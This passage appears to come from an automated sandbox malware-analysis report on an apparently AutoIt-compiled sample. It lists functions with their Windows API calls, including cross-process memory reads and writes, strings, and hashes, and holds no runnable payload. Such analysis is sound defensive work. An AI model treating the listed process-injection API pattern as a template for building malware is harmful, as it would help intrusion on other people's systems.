                                                • Instruction ID: fa9f5f8193dfb27a6bc5155109457b0bd36ad4593992017f665b5c9cc43c5d49
                                                • Opcode Fuzzy Hash: ab1b2f70a645323fa154174f046001056899afbe4bb2863914687dfe75888b9a
                                                • Instruction Fuzzy Hash: 2E515C71A083419FDB28DF28C881B6FBBE5BF85714F04492DE98997351E739DA01CB92
                                                Function 007862F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memset$_memmove
                                                • String ID: ERCP
                                                • API String ID: 2532777613-1384759551
                                                • Opcode ID: 90fe1df5284464d2357abc0874a992af060512ef3c14c44d9abea898f5a9bf3b
                                                • Instruction ID: 8b806fc06372a51b7f8ca27a6ff9b1a47cd7649bc5c02255a8e6d8084ba2c321
                                                • Opcode Fuzzy Hash: 90fe1df5284464d2357abc0874a992af060512ef3c14c44d9abea898f5a9bf3b
                                                • Instruction Fuzzy Hash: F751B371900359EFDB24DF55C845BAAB7F4FF04314F20856EE94ACB241E778AA84CB80
                                                Function 007C9AB7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007D17ED: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C9558,?,?,00000034,00000800,?,00000034), ref: 007D1817
                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007C9B01
                                                  • Part of subcall function 007D17B8: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C9587,?,?,00000800,?,00001073,00000000,?,?), ref: 007D17E2
                                                  • Part of subcall function 007D170F: GetWindowThreadProcessId.USER32(?,?), ref: 007D173A
                                                  • Part of subcall function 007D170F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,007C951C,00000034,?,?,00001004,00000000,00000000), ref: 007D174A
                                                  • Part of subcall function 007D170F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,007C951C,00000034,?,?,00001004,00000000,00000000), ref: 007D1760
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007C9B6E
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007C9BBB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                • String ID: @
                                                • API String ID: 4150878124-2766056989
                                                • Opcode ID: ad77094374dca727c20747a3864e6e1efcff2593c44dc2df54248afe958e0b09
                                                • Instruction ID: 9b472a310ce3e522691694df1fc54b58c3f5d78147c0dd7bf36086289c1b4f72
                                                • Opcode Fuzzy Hash: ad77094374dca727c20747a3864e6e1efcff2593c44dc2df54248afe958e0b09
                                                • Instruction Fuzzy Hash: B6413B76900218BFDB10EFA4CD85EEEBBB8AF09310F104099FA55B7291DA746E45CB60
                                                Function 007F7978 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007FF910,00000000,?,?,?,?), ref: 007F7A11
                                                • GetWindowLongW.USER32 ref: 007F7A2E
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007F7A3E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$Long
                                                • String ID: SysTreeView32
                                                • API String ID: 847901565-1698111956
                                                • Opcode ID: 89c8b77d5dcac8a5fe6c0e4310575d496bce911fd860cdd61aa0941d47401981
                                                • Instruction ID: 5f94aae5a7862cdb29fbe1e17398c1ad087dbaeb3697ab63a8793be7b6b8f69b
                                                • Opcode Fuzzy Hash: 89c8b77d5dcac8a5fe6c0e4310575d496bce911fd860cdd61aa0941d47401981
                                                • Instruction Fuzzy Hash: E9319D3120460AABDF158E38CC45BFA77A9EF45334F248725F975D22E0C778A951CB50
                                                Function 007F740B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007F7493
                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007F74A7
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 007F74CB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window
                                                • String ID: SysMonthCal32
                                                • API String ID: 2326795674-1439706946
                                                • Opcode ID: eb12b401e33414f919ab93546e239efc6cda38a697eb47de300e1faed48bbda1
                                                • Instruction ID: fcfed0303eba371118084b0233a26477ddbe64e13b2e413158700438b133f7b2
                                                • Opcode Fuzzy Hash: eb12b401e33414f919ab93546e239efc6cda38a697eb47de300e1faed48bbda1
                                                • Instruction Fuzzy Hash: 0C21A33250021DABDF258F94DC46FFA3B79FF48724F110114FE54AB290DA79A851DB90
                                                Function 007F7BC5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007F7C7C
                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007F7C8A
                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007F7C91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$DestroyWindow
                                                • String ID: msctls_updown32
                                                • API String ID: 4014797782-2298589950
                                                • Opcode ID: dac3df10a4f8d515217892e473af339090e10fe959b79b209229971ad9c57c11
                                                • Instruction ID: 763f94e2e92112063bde5910f0aceea092d2cbedc489a3afc932a412d8087827
                                                • Opcode Fuzzy Hash: dac3df10a4f8d515217892e473af339090e10fe959b79b209229971ad9c57c11
                                                • Instruction Fuzzy Hash: 4F2148B5604209AFDB14DF14DC81CB73BEDEB4A3A4B050459FA009B361DA35EC51CAA0
                                                Function 007F6CE2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007F6D6D
                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007F6D7D
                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007F6DA2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$MoveWindow
                                                • String ID: Listbox
                                                • API String ID: 3315199576-2633736733
                                                • Opcode ID: fe62b08e1b190b5509e9e57b987c34acf1b39d50ae8767791036dcd6ea73c706
                                                • Instruction ID: e7c403986e8e438a49e34fa2f17a16508f5f8f3c9660d10f02f921bb33bd9b5e
                                                • Opcode Fuzzy Hash: fe62b08e1b190b5509e9e57b987c34acf1b39d50ae8767791036dcd6ea73c706
                                                • Instruction Fuzzy Hash: BE21C232710118BFEF118F54DC85EBB3BAAEF89764F118124FA049B290CA75AC51C7A0
                                                Function 007F7740 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007F77A4
                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007F77B9
                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007F77C6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: msctls_trackbar32
                                                • API String ID: 3850602802-1010561917
                                                • Opcode ID: cf23ccb916ae01a50e28f559edbf61caabae3c14f0c6eeb7221d8ccc1d24b2a1
                                                • Instruction ID: 3fefdbf407728c6ce426b05f23c01991c74bddd1b68e89603c93f063c4ee8684
                                                • Opcode Fuzzy Hash: cf23ccb916ae01a50e28f559edbf61caabae3c14f0c6eeb7221d8ccc1d24b2a1
                                                • Instruction Fuzzy Hash: 9811E332254208BAEF246F74CC45FFB7BA9EF88B64F014518FB41A61E0D675A851CB20
                                                Function 00774C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00774C2E), ref: 00774CA3
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00774CB5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                • API String ID: 2574300362-192647395
                                                • Opcode ID: 4575a30917675a6be534d26a65f6c719e3c8b1a47339376623eccc6632cc861c
                                                • Instruction ID: 0cb634563ddccb47fce34ba03c42187676d7e5d105e9d2d092ce8be9ba9fcded
                                                • Opcode Fuzzy Hash: 4575a30917675a6be534d26a65f6c719e3c8b1a47339376623eccc6632cc861c
                                                • Instruction Fuzzy Hash: EED012B051172BCFDB205F31D95861676E5AF05791B11C839D885D6250DB78D480C660
                                                Function 00774D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00774D2E,?,00774F4F,?,008352F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00774D6F
                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00774D81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-3689287502
                                                • Opcode ID: a01b2decb317188311e5d39e2080fb161a9afb69cd5e05e80650820e896f32e4
                                                • Instruction ID: 85922f76cc3faf73f247893d4c939bc8a705389e301bde7c71ee54887e684ec1
                                                • Opcode Fuzzy Hash: a01b2decb317188311e5d39e2080fb161a9afb69cd5e05e80650820e896f32e4
                                                • Instruction Fuzzy Hash: EAD01770610B27CFDB309F31D84862676E9BF15392B11C83AD5DAD6360EB78D880CA50
                                                Function 00774D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00774CE1,?), ref: 00774DA2
                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00774DB4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-1355242751
                                                • Opcode ID: 90e10e8a7850dd35f9eb33cefaf0851df14177691c83da8632cf854628e132b2
                                                • Instruction ID: f895f85622b155683dabb1cbd3fa6d7f2a69473b4e33da71cc29b95bfa2e5a97
                                                • Opcode Fuzzy Hash: 90e10e8a7850dd35f9eb33cefaf0851df14177691c83da8632cf854628e132b2
                                                • Instruction Fuzzy Hash: F1D0C770640B23DFCB308F31D808A6272E5AF02390B10C83AD8EAC6260EB78C880CA10
                                                Function 007F0E72 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,007F10C1), ref: 007F0E80
                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007F0E92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                • API String ID: 2574300362-4033151799
                                                • Opcode ID: 9120ff044c0a52f8a06d083ea0eb9d31a875ebdb5c3e681ea865672bd91756fa
                                                • Instruction ID: d591841ddf0c5a322363b42851090a5907c6aa768aecd6300a85707b1b1dce03
                                                • Opcode Fuzzy Hash: 9120ff044c0a52f8a06d083ea0eb9d31a875ebdb5c3e681ea865672bd91756fa
                                                • Instruction Fuzzy Hash: 3CD0E27061072BCFD720AF35DA186A676E4AF04352F11CC2AE59AD2350EA7CC880CA90
                                                Function 007E91F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000001,007E8E09,?,007FF910), ref: 007E9203
                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007E9215
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                • API String ID: 2574300362-199464113
                                                • Opcode ID: e1e6ee028e8cb36817bc0c232c9bc6ea4269155170e90ef978c588218500d065
                                                • Instruction ID: 86e743d88091a1ea3090edfe8ae93bd1e91ea7a02298f43831737fef475145c8
                                                • Opcode Fuzzy Hash: e1e6ee028e8cb36817bc0c232c9bc6ea4269155170e90ef978c588218500d065
                                                • Instruction Fuzzy Hash: 93D0C77155172BDFCB208F32DD0821273EABF08351B00C83ADA82C2290EE78C880CA10
                                                Function 007B1A6D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: LocalTime__swprintf
                                                • String ID: %.3d$WIN_XPe
                                                • API String ID: 2070861257-2409531811
                                                • Opcode ID: a89bc620dd50ec993cf9f4b0c36dfecdea0cdd645d5ca70c33264185413c0360
                                                • Instruction ID: 0221ec3759b8287cd3ee10b5116f43b399d39c75e5271d1ade34f3ac4958dd6e
                                                • Opcode Fuzzy Hash: a89bc620dd50ec993cf9f4b0c36dfecdea0cdd645d5ca70c33264185413c0360
                                                • Instruction Fuzzy Hash: C9D01271805119EACB04D6D19C95EFD737CFB08300FD4C052F406D1040E62DAB94DA25
                                                Function 007C74A5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 45968ed35f7c8bbee9486a52ef76c1928cbdf3d4be1465ade22cf23c6915e54c
                                                • Instruction ID: f5da0480ccf511c13969eb6c9ab5d7268e98c38db73831c59087f27ace62ed17
                                                • Opcode Fuzzy Hash: 45968ed35f7c8bbee9486a52ef76c1928cbdf3d4be1465ade22cf23c6915e54c
                                                • Instruction Fuzzy Hash: A2C12975A0421AEFCB18CF98C884EAABBB5FF48714B15859CE805EB251DB34ED41DF90
                                                Function 007EE13E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CharLowerBuffW.USER32(?,?), ref: 007EE1D2
                                                • CharLowerBuffW.USER32(?,?), ref: 007EE215
                                                  • Part of subcall function 007ED8B9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007ED8D9
                                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007EE415
                                                • _memmove.LIBCMT ref: 007EE428
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: BuffCharLower$AllocVirtual_memmove
                                                • String ID:
                                                • API String ID: 3659485706-0
                                                • Opcode ID: f66c1e5278d5a409ef9d2e1fa3f469c4eb6361cf16c2c71eb302f203c4fa2ce7
                                                • Instruction ID: 388eb1a87c191c4967ebc2a5702df495ffc3b713c83ff37cb5096d90d9f847cd
                                                • Opcode Fuzzy Hash: f66c1e5278d5a409ef9d2e1fa3f469c4eb6361cf16c2c71eb302f203c4fa2ce7
                                                • Instruction Fuzzy Hash: ECC17771A09341DFCB04DF29C48496ABBE4FF89314F04896EF9999B351D738E946CB82
                                                Function 007E81A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                Download Yara Rule
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 007E81D8
                                                • CoUninitialize.OLE32 ref: 007E81E3
                                                  • Part of subcall function 007CD87B: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007CD8E3
                                                • VariantInit.OLEAUT32(?), ref: 007E81EE
                                                • VariantClear.OLEAUT32(?), ref: 007E84BF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                • String ID:
                                                • API String ID: 780911581-0
                                                • Opcode ID: 76c809466a7507a0a2387be4721af016fb9a242c8475b49b1d5925040b26b8fa
                                                • Instruction ID: f3597f4c52b7d0d2440662b1cf7c504e4b3882b30e32f060bb25a7910922a400
                                                • Opcode Fuzzy Hash: 76c809466a7507a0a2387be4721af016fb9a242c8475b49b1d5925040b26b8fa
                                                • Instruction Fuzzy Hash: 0CA14675205741DFDB50DF25C489A2AB7E4BF89764F04845DFA9A9B3A1CB38ED00CB82
                                                Function 007C7858 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                Download Yara Rule
                                                APIs
                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00802C7C,?), ref: 007C7A12
                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00802C7C,?), ref: 007C7A2A
